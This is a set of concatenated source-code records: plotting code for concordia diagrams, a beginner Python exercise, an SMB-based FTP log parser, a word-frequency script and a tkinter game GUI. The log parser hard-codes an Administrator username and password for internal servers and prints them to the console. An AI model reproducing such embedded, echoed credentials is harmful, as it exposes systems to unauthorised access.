scale_factor, 1.)\n\n # ------ testing only - comment out -------\n #plot line parallel to concordia slope\n # b = slope\n # a = y[i] - b * x[i]\n # ax.plot((xmin, xmax), (a + b * xmin, a + b * xmax)), 'b--', lw=0.5, zorder=100)\n # ---------------------------\n\n # theta is the angle from positive x axis to offset the text box (for\n # normal markers, this will be orthoganol to the slope of the\n # concordia):\n orth_angle = angle + np.pi / 2.\n orth_angle_disp = angle_disp + np.pi / 2.\n\n # Find slope and intercept of a line running orthogonal (on scaled plot)\n # to the concordia curve at x, y:\n # b = np.tan(theta * np.pi / 180)\n orth_slope = np.tan(orth_angle) # true orthogonal line (data coords)\n b_disp = orth_slope * scale_factor # apparent orthogonol line (display coords)\n b = orth_slope * scale_factor ** 2 # apparent orthogonal line (data coords)\n\n # x,y in display coords\n # x_disp, y_disp = ax.transData.transform((x[i], y[i]))\n # a_disp = y_disp - b_disp * x_disp\n\n # ------ testing only - comment out-------\n # plot line orthogonal to slope\n # a = y[i] - b * x[i]\n # xx = np.linspace(*ax.get_xlim())\n # yy = a + b * xx\n # ax.plot(xx, yy, 'm--', lw=0.5, zorder=100)\n # ---------------------------\n\n if cfg.rotate_conc_labels:\n if cfg.perpendicular_rotation:\n if diagram == 'tw':\n an.set_rotation(orth_angle_disp * 180 / np.pi)\n elif diagram == 'wc':\n an.set_rotation(orth_angle_disp * 180 / np.pi)\n d = w / 2.\n\n else: # rotate parallel\n if diagram == 'tw':\n an.set_rotation(angle_disp * 180 / np.pi)\n elif diagram == 'wc':\n an.set_rotation(angle_disp * 180 / np.pi)\n d = h / 2.\n else:\n # Find intersection points of this orthogonal slope line and text\n # bbox: # need to call this again after rotation\n a_disp = y_disp - b_disp * x_disp\n ints = plotting.box_line_intersection(an_bbox.xmin, an_bbox.xmax,\n an_bbox.ymin, an_bbox.ymax, a_disp, b_disp)\n # offset text box by this extra amount (data coords)\n d = np.sqrt(np.sum((ints[1] - ints[0]) ** 2)) / 2.\n\n\n # Compute offsets\n f = cfg.offset_factor\n # d is the mimumum offset, f 
is extra user-defined offset (relative\n # label height and thus textsize)\n\n # dx_disp = (d + f * h) * -np.abs(np.cos(orth_angle_disp))\n # dy_disp = (d + f * h) * -np.sign(orth_slope) * np.sin(orth_angle_disp)\n dx_disp = -np.sqrt((d + f * h) ** 2 / (b_disp ** 2 + 1.))\n if diagram == 'tw' and b_disp < 0:\n dx_disp *= -1.\n dy_disp = b_disp * dx_disp\n\n # If age ellipses, add extra offset label along ellipse axis:\n if ell:\n # ---- testing -----\n # plot bbox around ellipse\n # ellbb = ax.transData.inverted().transform(ell_obj[i].get_extents())\n # rec = Rectangle((np.min(ellbb[:, 0]), np.min(ellbb[:, 1])),\n # ell_obj[i].width, ell_obj[i].height,\n # fc='none', ec='red', lw=0.5, zorder=100)\n # ax.add_patch(rec)\n # ------------------\n\n # Get slope and y-int of line projected through ellipse major axis.\n\n # ---- old appraoch -----\n # WARNING !! This doesn't always work as expected !!\n # e_angle = ell_obj[i].get_angle() * np.pi / 180\n # eb = np.tan(e_angle)\n # eb_disp = eb / scale_factor\n # -------\n\n # get ellipse bbox from path:\n # path_xy = ax.transData.inverted().transform(ell_obj[i].get_verts())\n path_xy = ell_obj[i].get_verts()\n ind_xmin = np.argmin(path_xy[:, 0])\n ind_xmax = np.argmax(path_xy[:, 0])\n ind_ymin = np.argmin(path_xy[:, 1])\n ind_ymax = np.argmax(path_xy[:, 1])\n\n xy_xmin = path_xy[ind_xmin, :]\n xy_xmax = path_xy[ind_xmax, :]\n xy_ymin = path_xy[ind_ymin, :]\n xy_ymax = path_xy[ind_ymax, :]\n\n # --- tesing ----\n # for xy in (xy_xmin, xy_xmax, xy_ymin, xy_ymax):\n # xy = ax.transData.inverted().transform(xy)\n # ax.plot(*xy, 'mo', ms=4, zorder=120)\n # -------\n\n # offset along line parralell / orthogonal to ellipse extreme values\n if diagram == 'tw':\n if np.isclose(xy_ymax[0], xy_ymin[0]):\n # eb_disp = 0.\n # no correlation - offset along conc. slope:\n eb_disp = b_disp\n else:\n eb_disp = (xy_ymax[1] - xy_ymin[1]) / (xy_ymax[0] - xy_ymin[0])\n else:\n if np.isclose(xy_xmax[1], xy_xmin[1]):\n # eb_disp = np.inf\n # no correlation - offset along conc. 
slope:\n eb_disp = b_disp\n else:\n eb_disp = (xy_xmax[1] - xy_xmin[1]) / (xy_xmax[0] - xy_xmin[0])\n\n eb = eb_disp * scale_factor\n ea = y[i] - eb * x[i]\n ea_disp = y_disp - eb_disp * x_disp\n\n # ---- testing -----\n # ax.plot((xmin, xmax), (ea + eb * xmin, ea + eb * xmax),\n # lw=0.5, c='red', ls='-')\n # xmin_disp = ax.get_window_extent().xmin\n # ymin_disp = ax.get_window_extent().ymin\n # xmax_disp = ax.get_window_extent().xmax\n # ymax_disp = ax.get_window_extent().ymax\n # y1 = ea_disp + eb_disp * xmin_disp\n # y2 = ea_disp + eb_disp * xmax_disp\n # x1, y1 = ax.transData.inverted().transform((xmin_disp, y1))\n # x2, y2 = ax.transData.inverted().transform((xmax_disp, y2))\n # ax.plot((x1, x2), (y1, y2), lw=0.5, c='blue', ls='-')\n # -------\n\n # find intercept points b/w conc slope line and bbox defined\n # by x, y min and max points on ellipse (calling get_window_extents\n # doesn't seem to work properly all the time?)\n ints = plotting.box_line_intersection(xy_xmin[0], xy_xmax[0],\n xy_ymin[1], xy_ymax[1], ea_disp, eb_disp)\n\n if ints.size == 0:\n warnings.warn(f'individualised age ellipse label routine failed '\n f'for {t[i]} Ma marker')\n np.array(markers_dict['add_label'])[i] = False\n an.remove()\n continue\n\n # ----- testing ----\n # ax.plot(*ax.transData.inverted().transform(ints[0, :]), 'bo', ms=2, zorder=100)\n # ax.plot(*ax.transData.inverted().transform(ints[1, :]), 'bo', ms=2, zorder=100)\n # dd = ints[0, :] - np.array((x_disp, y_disp))\n # dx = dd[0]\n # dy = dd[1]\n # dist = np.sqrt(dx ** 2 + dy ** 2)\n # -----\n\n # offset text box by this extra amount (data coords)\n d2 = np.sqrt(np.sum((ints[1] - ints[0]) ** 2)) / 2.\n\n dx_disp2 = -np.sqrt(d2 ** 2 / (eb_disp ** 2 + 1.))\n dy_disp2 = eb_disp * dx_disp2\n\n # ---testing---\n # x2, y2 = ax.transData.inverted().transform((x_disp + dx_disp2, y_disp + dy_disp2))\n # ax.plot(x2, y2, 'go', ms=2, zorder=100)\n # ----\n\n dx_disp += dx_disp2\n dy_disp += dy_disp2\n\n # Transform x, y from display coords back to data coords and re-set\n # annotation position.\n # xy = ax.transData.inverted().transform((x_disp, y_disp))\n x_dat, y_dat = ax.transData.inverted().transform((x_disp + dx_disp,\n y_disp + dy_disp))\n an.set_position((x_dat, y_dat))\n\n\n label_annotations.append(an)\n\n if remove_overlaps:\n remove_overlapping_labels(label_annotations)\n\n markers_dict['label_annotations'] = label_annotations\n return markers_dict\n\n\ndef remove_overlapping_labels(an):\n \"\"\"\n Naive routine for removing overlapping concordia labels older than first\n overlap point.\n\n an : array-like\n list of concordia age marker / ellipse label annotations\n \"\"\"\n n = len(an)\n overlap = np.full(n, False)\n\n # Check if annotation bbox fully (?) overlaps axis bbox,\n # and flag if not.\n for i in range(n - 1):\n b1 = an[i].get_window_extent() # in display coords\n b2 = an[i + 1].get_window_extent()\n if b1.overlaps(b2):\n overlap[i + 1] = True\n else:\n overlap[i + 1] = False\n n_overlap = np.sum(overlap == True)\n\n # If overlaps found:\n # 1. If only youngest label overlaps, remove this and keep all others.\n # 2. If n > 5 and only youngest 2 overlap, remove these 2 and keep others.\n # 3. 
Otherwise remove from oldest down to first overlap.\n if n_overlap > 0:\n if n > 2 and n_overlap == 1 and overlap[0]:\n an[0].remove()\n elif n > 5 and n_overlap == 2 and overlap[0] and overlap[1]:\n an[0].remove()\n an[1].remove()\n else:\n for j in reversed(range(np.argwhere(overlap).min(), n)):\n an[j].remove()\n","repo_name":"timpol/pysoplot","sub_path":"src/pysoplot/concordia.py","file_name":"concordia.py","file_ext":"py","file_size_in_byte":55959,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"}
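The concordia labelling code in the record above rotates each annotation to follow the local slope of the curve, converting the slope from data coordinates to display coordinates with a scale factor before taking the angle. The short sketch below illustrates only that conversion on a generic matplotlib axes; the demo curve, the point at x = 5 and all names are invented for illustration and are not taken from the pysoplot source.

import numpy as np
import matplotlib.pyplot as plt

fig, ax = plt.subplots()
x = np.linspace(0.0, 10.0, 200)
y = 0.05 * x ** 2                      # arbitrary demo curve
ax.plot(x, y)
ax.set_xlim(0.0, 10.0)
ax.set_ylim(0.0, 5.0)

x0 = 5.0
slope_data = 2 * 0.05 * x0             # dy/dx at x0 in data coordinates

# convert the slope to display coordinates so the label follows the curve
# as drawn, independent of axis limits and window aspect ratio
bbox = ax.get_window_extent()
scale_factor = (5.0 / 10.0) / (bbox.height / bbox.width)
angle_disp = np.degrees(np.arctan2(slope_data / scale_factor, 1.0))

ax.annotate("5.0", (x0, 0.05 * x0 ** 2), rotation=angle_disp,
            ha="center", va="bottom")
plt.show()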
+{"seq_id":"16529769203","text":"\"\"\" Print each element of the list\"\"\"\npets = ['cat','dog','fish','bird','rabit','neighbor']\n\nfor pet in pets:\n print(pet)\n\n# while loop testing\ni_need_more_money=20\nwhile i_need_more_money < 35:\n print(\"Now I have \",i_need_more_money)\n i_need_more_money += 1\n\n# Write a program that guess a number between 1 to 10\nimport random\ncounter = 0\ntarget_numnber, guess_number=random.randint(1,10),3\n\nwhile target_numnber != guess_number:\n target_numnber, guess_number=random.randint(1,10),3\n print (\"Keep Guesting - \", counter,target_numnber, guess_number)\n counter += 1\n\n","repo_name":"nileshvarshney/python","sub_path":"simple_python/days/Day8.py","file_name":"Day8.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14609641822","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# #### FTP(IIS)のログを解析する\n# ##### IN : IIS(FTP)のログ置き場にSMBで取得、必要情報\n# ##### OUT:\n# \n# https://sinhrks.hatenablog.com/entry/2014/11/21/231534\n\n# ###### 必要ライブラリ\n\n# In[ ]:\n\n\n#get_ipython().system('pip install pysmb')\n\n\n# In[1]:\n\n\nfrom smb.SMBConnection import SMBConnection\nimport platform\nimport pandas as pd\nimport re\nimport io\nimport datetime as dt\nfrom pathlib import Path\n#from tqdm import tqdm\nfrom tqdm.auto import tqdm\nimport typer\n#import os\nimport gc\n\n#import json\nimport pickle\n\n\n# In[2]:\n\n\nglobal order\nglobal logs_head\norder = [\n \"date\",\"time\",\"c-ip\",\"cs-username\",\"s-ip\",\n \"s-port\",\"cs-method\",\"cs-uri-stem\",\"sc-status\",\"sc-win32-status\",\n \"sc-substatus\",\"time-taken\",\"x-session\",\"x-fullpath\"]\nlogs_head = [\n 'c-ip','cs-username','s-ip','s-port',\n 'cs-method','cs-uri-stem','sc-status','sc-win32-status',\n 'sc-substatus','time-taken','x-session','x-fullpath','timestamp']\n\n\nglobal FILE_NUMBER\nFILE_NUMBER = 0\n\n\n# In[3]:\n\n\ndef envset(argLOG_YMD, argYMD):\n global ENV\n global ip_address\n global user\n global password\n global remote_hostname \n global LOG_YMD\n global SHARE_NAME\n global FILE_TO_PATH\n global HOME_PATH\n global OUT_PATH\n global LOG_PATH\n global YMD\n global OUT_FILE\n global picklepath\n global OUT_SUM_FILE\n \n LOG_YMD = argLOG_YMD\n ENV = 'HONBAN' \n #ENV = 'TEST'\n if(ENV == 'TEST'):\n ip_address = '172.30.9.85'\n user = 'Administrator'\n password = 'panic'\n remote_hostname = 'RGSV920'\n else:\n ip_address = '172.30.4.193'\n user = 'Administrator'\n password = 'panic'\n remote_hostname = 'SESV400'\n\n SHARE_NAME = 'd$'\n FILE_TO_PATH = 'Ftp/Logs/2021/'\n FILE_TO_PATH = 'Ftp/Logs/2022/'\n HOME_PATH = '/home/jovyan/'\n OUT_PATH = HOME_PATH + 'datasets/Ftplogs/Output/'\n LOG_PATH = f'{HOME_PATH}datasets/Ftplogs/{remote_hostname}/'\n #YMD = f'%s' % dt.datetime.now().strftime('%Y%m%d')\n YMD = argYMD\n #\n #OUT_FILE = f'{OUT_PATH}Log/{YMD}_{remote_hostname}_{LOG_YMD}_{FILE_NUMBER}_FtpLogs.csv'\n #picklepath = f'{OUT_PATH}Pickle/{YMD}_{remote_hostname}_{LOG_YMD}_{FILE_NUMBER}_FtpLogs.csv.pickle'\n #OUT_SUM_FILE = f'{OUT_PATH}Sumary/{YMD}_{remote_hostname}_{LOG_YMD}_{FILE_NUMBER}_FtpLogsSumary.csv'\n \n print(f'%-20s:{ENV:<15s}' % (\"ENV\"))\n print(f'%-20s:{ip_address:<15s}' % (\"ip_address\"))\n print(f'%-20s:{user:<15s}' % (\"user\"))\n print(f'%-20s:{password:<15s}' % (\"password\"))\n print(f'%-20s:{remote_hostname:<15s}' % (\"remote_hostname\"))\n print(f'%-20s:{SHARE_NAME:<15s}' % (\"SHARE_NAME\"))\n print(f'%-20s:{OUT_PATH:<15s}' % (\"OUT_PATH\"))\n print(f'%-20s:{LOG_PATH:<15s}' % (\"LOG_PATH\"))\n print(f'%-20s:{YMD:<15s}' % (\"YMD\"))\n print(f'%-20s:{LOG_YMD:<15s}' % (\"LOG_YMD\"))\n \n \n\n\n# In[4]:\n\n\ndef filenames(argFILE_NUMBER):\n \n global OUT_FILE\n global picklepath\n global OUT_SUM_FILE\n \n OUT_FILE = f'{OUT_PATH}Log/{YMD}_{remote_hostname}_{LOG_YMD}_{argFILE_NUMBER:02}_FtpLogs.csv'\n picklepath = f'{OUT_PATH}Pickle/{YMD}_{remote_hostname}_{LOG_YMD}_{argFILE_NUMBER:02}_FtpLogs.csv.pickle'\n OUT_SUM_FILE = f'{OUT_PATH}Sumary/{YMD}_{remote_hostname}_{LOG_YMD}_FtpLogsSumary.csv'\n \n print(f'%-20s:{OUT_FILE:<15s}' % (\"OUT_FILE\"))\n print(f'%-20s:{picklepath:<15s}' % (\"picklepath\"))\n print(f'%-20s:{OUT_SUM_FILE:<15s}' % (\"OUT_SUM_FILE\"))\n \n\n\n# In[5]:\n\n\n#\ndef SMBFileList():\n print(\"==================================================\")\n result = False\n conn = SMBConnection(\n user,\n 
password,\n platform.uname().node,\n remote_hostname,\n domain='WORKGROUP',\n use_ntlm_v2=True)\n result = conn.connect(ip_address, 139)\n print(result)\n return result, conn\n\n\n# In[6]:\n\n\ndef LogRead(filename, arg1):\n #df =pd.DataFrame(columns = order)\n def proc1(lines):\n cnt = 0\n all = len(lines)\n bar_template = \"\"\n for buf in lines:\n cnt+=1\n print(f'\\r{filename:_<10}:{cnt:07}/{all:07} [{cnt/all:.2%}]', end=\"\")\n _line = buf.decode() if arg1 == 1 else buf\n if not re.search('^#', _line):\n (\n date,time,cip,csusername,sip,\n sport,csmethod,csuristem,scstatus,scwin32status,\n scsubstatus,timetaken,xsession,xfullpath\n ) = _line.split(' ')\n df.loc[len(df)] = [\n date,time,cip,csusername,sip,\n sport,csmethod,csuristem,scstatus,scwin32status,\n scsubstatus,timetaken,xsession,xfullpath\n ]\n def proc2(filepath):\n txt = Path(filepath).resolve()\n length = sum(1 for row in open(txt, 'r'))\n chunksize = 5000\n df_t = pd.DataFrame()\n typer.secho(f\"Reading file: {txt}\", fg=\"red\", bold=True)\n #typer.secho(f\"total rows: {length}\", fg=\"green\", bold=True)\n with tqdm(total=length, desc=\"chunks read: \") as bar:\n dsz = length\n for i, chunk in enumerate(pd.read_csv(txt, \n chunksize=chunksize, \n low_memory=False, \n header = None, \n #skiprows=4, \n comment='#',\n sep=' ', \n names=order,\n parse_dates={'timestamp':['date', 'time']}\n )):\n df_t = pd.concat([df_t,chunk])\n bar.update(min(dsz, chunksize))\n dsz -= chunksize\n #typer.secho(\"end of reading chunks...\", fg=typer.colors.BRIGHT_RED, end=\"\")\n #typer.secho(f\"Dataframe length:{len(df_t)}\", fg=\"green\", bold=True)\n return df_t\n if(arg1 == 1):\n # 遅いので使わない\n with io.BytesIO() as file:\n conn.retrieveFile(SHARE_NAME, FILE_TO_PATH + filename, file)\n file.seek(0)\n proc1(file.read().splitlines())\n file.close()\n elif(arg1 == 2):\n # 遅いので使わない\n with open(LOG_PATH + filename) as file:\n proc1(file.read().splitlines())\n file.close()\n elif(arg1 == 3):\n df = proc2(LOG_PATH + filename)\n #df = pd.read_csv(LOG_PATH + filename, header = None, skiprows=4, sep=' ', names=order)\n #return df\n #df_res = pd.concat([df_res, df])\n #print(\"--------------------------- concat \")\n #print(df_res.dtypes)\n else:\n print(2) \n return df\n\n\n# In[7]:\n\n\ndef LogWrite(filename, conn):\n with open(LOG_PATH + filename, 'wb') as file:\n conn.retrieveFile(SHARE_NAME, FILE_TO_PATH + filename, file)\n return 1\n\n\n# In[8]:\n\n\ndef main(argLOG_YMD, argYMD = f'%s' % dt.datetime.now().strftime('%Y%m%d')):\n #print(\"[main]\")\n #LOG_YMD = argLOG_YMD\n envset(argLOG_YMD, argYMD)\n\n #SMBコネクション生成\n #ret, conn = SMBFileList()\n ret ,conn = SMBFileList()\n assert ret == True\n\n #SMBファイル一覧\n #items = []\n items = conn.listPath(\n SHARE_NAME,\n FILE_TO_PATH\n )\n assert len(items) > 0\n \n #FTPログヘッダー\n #order = [\n # \"date\",\"time\",\"c-ip\",\"cs-username\",\"s-ip\",\n # \"s-port\",\"cs-method\",\"cs-uri-stem\",\"sc-status\",\"sc-win32-status\",\n # \"sc-substatus\",\"time-taken\",\"x-session\",\"x-fullpath\"\n #]\n #FTPログDataFrame\n df_res = pd.DataFrame(columns = order)\n df_concat = pd.DataFrame(columns = logs_head)\n #print('<==========>')\n def proc1(argfilename, df_concat, df_res, OUT_FILE):\n df_concat = pd.concat([df_concat, df_res])\n df_concat = df_concat.drop(['date','time'], axis=1) \n #print(OUT_FILE)\n df_concat.index = pd.DatetimeIndex(df_concat.timestamp, name='timestamp')\n df_concat.index = df_concat.index.tz_localize('UTC')\n df_concat.index = df_concat.index.tz_convert('Asia/Tokyo')\n df_concat.timestamp = 
df_concat.index\n df_concat = df_concat.reset_index(drop=True)\n df_concat.to_csv(OUT_FILE)\n #print(df_concat.info())\n df_concat.to_pickle(picklepath)\n \n #print('<==========>')\n FILE_NUMBER = 0\n FILE_SIZE = 300000000\n FILE_SIZE_CUR = 0\n filenames(FILE_NUMBER)\n \n for item in items:\n #print(f'%s %d bytes' % (item.filename, item.alloc_size)) \n if(not item.isDirectory and \n re.search(LOG_YMD, item.filename)):\n print(f'%s %d bytes' % (item.filename, item.alloc_size)) \n FILE_SIZE_CUR += item.alloc_size\n if(int(FILE_SIZE_CUR/FILE_SIZE) > 0):\n FILE_NUMBER += 1\n FILE_SIZE_CUR = item.alloc_size\n proc1(item.filename, df_concat,df_res, OUT_FILE)\n df_res = df_res[:0]\n df_concat = df_concat[:0]\n gc.collect() \n \n filenames(FILE_NUMBER)\n LogWrite(item.filename, conn)\n df_res = pd.concat([df_res, LogRead(item.filename, 3)])\n \n conn.close()\n \n proc1(item.filename, df_concat,df_res, OUT_FILE)\n df_res = df_res[:0]\n df_concat = df_concat[:0]\n gc.collect() \n return FILE_NUMBER\n #assert 0 > 1\n\n\n# In[9]:\n\n\ndef recov(FILE_NUMBER, argLOG_YMD, argYMD = f'%s' % dt.datetime.now().strftime('%Y%m%d')):\n envset(argLOG_YMD, argYMD)\n filenames(FILE_NUMBER)\n #picklepath = f'{OUT_PATH}{YMD}_{remote_hostname}_{argLOG_YMD}_FtpLogs.csv.pickle'\n with open(picklepath, mode='rb') as fp:\n df_concat = pickle.load(fp)\n \n df_concat['index'] = df_concat.reset_index().index\n print(len(df_concat['x-session'].unique()))\n df_min = df_concat.groupby('x-session', as_index=False)[['index','timestamp']].min()\n df_max = df_concat.groupby('x-session', as_index=False)[['index','timestamp']].max()\n df_min = df_min.rename(columns={'index':'index_min', 'timestamp':'timestamp_min'})\n df_max = df_max.rename(columns={'index':'index_max', 'timestamp':'timestamp_max'})\n df2 = pd.merge(df_min,df_max, on='x-session')\n \n df_group = df_concat.groupby(['x-session','c-ip','s-ip'], as_index=False)[['index']].min()\n #print(df_group.info())\n \n df3 = pd.merge(df2,df_group, on='x-session')\n\n df3['timestamp_diff'] = df3['timestamp_max'] - df3['timestamp_min']\n #df3['timestamp_ts'] = df3['timestamp_diff'].map(lambda x: x.total_seconds())\n df3['timestamp_ts'] = df3['timestamp_diff'].dt.total_seconds() + 1\n #display(df3)\n df3 = df3.drop(['index','timestamp_diff'], axis=1) \n df3['timestamp'] = df3['timestamp_min'].dt.strftime('%Y/%m/%d %H:%M:%S')\n df3['count'] = 1\n #\n print(df3.info())\n ##df3.to_csv(OUT_SUM_FILE)\n return df3\n\n\n# In[10]:\n\n\ndef graph(df3):\n import matplotlib.pyplot as plt\n import collections\n import itertools\n import warnings\n warnings.filterwarnings('ignore')\n # matplotlib日本語化対応\n import japanize_matplotlib\n\n all_from_list = df3['c-ip'].tolist()\n c = collections.Counter(df3['c-ip'].tolist())\n\n tags = pd.Series(c)\n #print(tags)\n df4 = df3.copy()\n df4.set_index('timestamp_min', inplace=True)\n\n df_tag_list = []\n # 先頭10\n top_tag_list = tags.sort_values(ascending=False).index.tolist()\n\n for t in top_tag_list:\n print(t)\n df_tag = df3[df3['c-ip'].apply(lambda x: t in x)]\n df_tag_list.append(df4[['timestamp_ts']].resample('H').sum())\n\n df_tags = pd.concat(df_tag_list, axis=1)\n df_tags.columns = top_tag_list\n\n df_tags[:-1].plot(stacked=True,figsize=(10, 4), title='上位10接続推移')\n plt.legend(title=\"接続先\", bbox_to_anchor=(1.05, 1)) # <-- ココ\n plt.show()\n\n df_tags[:-1].plot.bar(stacked=True, figsize=(10, 4), title='上位10接続推移積み上げ')\n plt.legend(title=\"接続先\", bbox_to_anchor=(1.05, 1)) # <-- ココ\n plt.show()\n\n\n# In[11]:\n\n\n#lp = ['21010','21011','21012'] 
#20220323\n#lp = ['21013','21022','21022'] #20220325\n#lp = ['21030','21031','21032','21033'] #20220325\n#lp = ['21040','21041','21042','21043'] #20220325\n#lp = ['21050','21051','21052','21053'] #20220325\n#lp = ['21060','21061','21062','21063'] #20220325\n#lp = ['21070','21071','21072','21073'] #20220325\n#lp = ['21080','21081','21082','21083'] #20220328\n#lp = ['21090','21091','21092','21093'] #20220328\n# #lp = ['21100','21101','21102','21103'] #20220328\n# #lp = ['21102'] #20220328-1 ['211020','211021','211022','211023','211024','211025']\n# #lp = ['21102'] #20220328-1 ['211026','211027','211028','211029']\n# #lp = ['21103'] #20220328\n#lp = ['2110'] #20220329\n#lp = ['2111'] #20220329\n#lp = ['2112'] #20220329\n#lp = ['2201'] #20220329\nlp = ['2202'] #20220329\ndf = pd.DataFrame()\nfor l in lp:\n print(f'[IN] YMD: {l}')\n n = main(l)\n for i in range(n):\n df = pd.concat([df, recov(i, l)])\n \n df.to_csv(OUT_SUM_FILE)\n #graph(recov(l, n))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"hasio21gg/jupyterlab-01","sub_path":"notebooks/ftplog/FtplogParse.py","file_name":"FtplogParse.py","file_ext":"py","file_size_in_byte":13282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
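The FtplogParse record above reads large IIS FTP logs with pandas in chunks and concatenates the pieces. Below is a minimal, self-contained sketch of that chunked-read pattern; the in-memory log text, the column list and the chunk size are placeholders, not values taken from the record.

import io
import pandas as pd

# a tiny in-memory stand-in for a large space-separated log file
log_text = "#Fields: date time c-ip sc-status\n2022-02-01 10:00:01 10.0.0.1 226\n2022-02-01 10:00:05 10.0.0.2 530\n"
columns = ["date", "time", "c-ip", "sc-status"]

chunks = []
for chunk in pd.read_csv(io.StringIO(log_text), sep=" ", comment="#",
                         header=None, names=columns, chunksize=1):
    chunks.append(chunk)

df = pd.concat(chunks, ignore_index=True)
# combine the date and time fields into a single timestamp column
df["timestamp"] = pd.to_datetime(df["date"] + " " + df["time"])
print(df)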
+{"seq_id":"32072486981","text":"from cProfile import label\nimport json\nimport collections\n\nimport matplotlib.pyplot as plt\nplt.rcParams['font.family'] = \"MS Gothic\"\n\nwith open(\"neko-sent-splited.json\", \"r\") as f:\n neko_data = json.load(f)\n\nkeyword = \"猫\"\nbase_list = []\nfor sent_data in neko_data:\n # てにをはばっか計算しても意味わからんので、助詞と補助記号を消してみる\n sent_data = filter(lambda x: x[\"pos\"] != \"助詞\" and x[\"pos\"] != \"補助記号\", sent_data)\n # 重複を消すためにいったんset\n _bases = set(list(map(lambda x: x[\"base\"], sent_data)))\n if keyword in _bases:\n base_list += list(_bases)\n\nc = collections.Counter(base_list)\nc.pop(keyword)\ntop10 = c.most_common()[:10]\n\nx = list(map(lambda x: x[0], top10))\ny = list(map(lambda x: x[1], top10))\n\nplt.bar(x, y)\nplt.savefig(\"37.png\")","repo_name":"eteeeeeerminal/practice-nlp100","sub_path":"4/37.py","file_name":"37.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33390253428","text":"from tkinter import * \nfrom tkinter.ttk import *\nfrom tkinter import filedialog\nfrom tkinter import messagebox\n\nfrom PIL import Image\nfrom PIL import ImageTk\n\nfrom config import *\n\nclass Panel(Frame):\n def __init__(self, master, *args, **kw):\n super().__init__(master, *args, **kw)\n \n def hide(self):\n self.grid_forget()\n \n def show(self):\n self.grid()\n\nclass Tile(Panel):\n candies_thumbs = {\n }\n\n def __init__(self, app, master, n, m, i, j, *args, **kwargs):\n super().__init__(master, width=TILE_WIDTH+TILE_BORDER, \n height=TILE_HEIGHT+TILE_BORDER, *args, **kwargs)\n \n self.app = app\n self.n = n\n self.m = m\n self.i = i\n self.j = j\n\n self.candy_thumb = None\n \n self.thumbnail = Canvas(self, bg=\"white\", width=TILE_WIDTH, \n height=TILE_HEIGHT)\n self.thumbnail.pack()\n self.thumbnail.bind('', lambda x: \n self.app.destruct(self.n-i-1, self.m-j-1) ) \n \n def show(self):\n self.thumbnail.pack(padx=TILE_BORDER/2, pady = TILE_BORDER/2)\n \n def hide(self):\n self.configure(bg=\"white\")\n self.thumbnail.pack_forget()\n \n \n def set(self, candy):\n if self.candy_thumb == candy.thumb():\n return True\n \n\n self.candy_thumb = candy.thumb() \n\n offset_width = (TILE_WIDTH - self.candy_thumb.width()) / 2\n offset_height = (TILE_HEIGHT- self.candy_thumb.height()) / 2\n \n self.thumbnail.delete(\"all\")\n self.thumbnail.create_image(offset_width, offset_height, anchor=NW, image=self.candy_thumb) \n self.thumbnail.pack(padx=TILE_BORDER/2, pady = TILE_BORDER/2)\n\n return None\n \nclass MainPanel(Panel):\n def __init__(self, app, master, n, m, *args, **kwargs):\n super().__init__(master, *args, **kwargs)\n self.app = app\n \n self.tiles=[[Tile(app, self, n, m, i, j) for j in range(m)] for i in range(n)]\n self.n=n\n self.m=m\n\n for i in range(n):\n for j in range(m):\n self.tiles[i][j].grid(row=i, column=j)\n self.tiles[i][j].show()\n\n def set(self, i,j, candy):\n self.tiles[self.n-i-1][self.m-j-1].set(candy)\n\nclass HeaderPanel(Panel):\n def __init__(self, app, master, *args, **kwargs):\n super().__init__(master, *args, **kwargs)\n self.app = app\n \n\n self.status = Frame(self)\n self.status.pack()\n\n self.timer = 0\n self.label_timer = Label(self.status)\n self.label_timer.configure(text='Time 0', font=DEFAULT_FONT)\n self.label_timer.grid(row=0, column=0)\n \n self.points = 0\n self.label_points = Label(self.status)\n self.label_points.configure(text='Points 0', font=DEFAULT_FONT)\n self.label_points.grid(row=0, column=1)\n \n self.label_alert = Label(self)\n self.label_alert.configure(text='', font=ALERT_FONT)\n \n self.reset = Frame(self)\n self.label_reset = Label(self)\n \n def reset_(self):\n self.timer = 0\n self.label_timer.configure(text='Time 0', font=DEFAULT_FONT)\n\n self.points = 0\n self.label_points.configure(text='Points 0', font=DEFAULT_FONT)\n self.label_alert.configure(text='')\n\n def set_timer(self, timer, delay):\n '''\n timer - time in ms\n '''\n if self.timer == timer:\n return True\n \n self.label_timer.configure(text='Time %d/%d' % ((timer/1000),(delay/1000)) )\n self.timer = timer\n \n def set_points(self, points, treshold):\n if self.points == points:\n return True\n\n self.label_points.configure(text='Points %d/%d' % (points,treshold))\n self.points = points\n \n\n def end_won(self):\n self.label_alert.configure(text='Congratulations : you win!')\n self.label_alert.pack()\n\n def end_lost(self):\n self.label_alert.configure(text='Game over...')\n self.label_alert.pack()\n\nclass MenuBar(Menu):\n def 
__init__(self, app, *args, **kwargs):\n super().__init__(app, font=DEFAULT_FONT, *args, **kwargs)\n self.app = app\n\n game_menu = Menu(self, font=DEFAULT_FONT)\n game_menu.add_command(label='New Game - Easy', command=lambda: self.app.new_game(Mod.EASY) )\n game_menu.add_command(label='New Game - Normal', command=lambda: self.app.new_game(Mod.NORMAL) )\n game_menu.add_command(label='New Game - Hard', command=lambda: self.app.new_game(Mod.HARDCORE) )\n self.add_cascade(label='Game', menu=game_menu)\n\n\n\n","repo_name":"severus21/BonBonCrush","sub_path":"marmotte/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
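In the gui.py record above the event name passed to Canvas.bind appears to have been stripped to an empty string; a common tkinter pattern binds a left mouse click with the '<Button-1>' event, as in this standalone sketch (widget sizes and names are illustrative, not taken from the record).

from tkinter import Tk, Canvas

root = Tk()
canvas = Canvas(root, bg="white", width=64, height=64)
canvas.pack()

def on_click(event):
    # event.x / event.y are the click coordinates inside the canvas
    print("clicked at", event.x, event.y)

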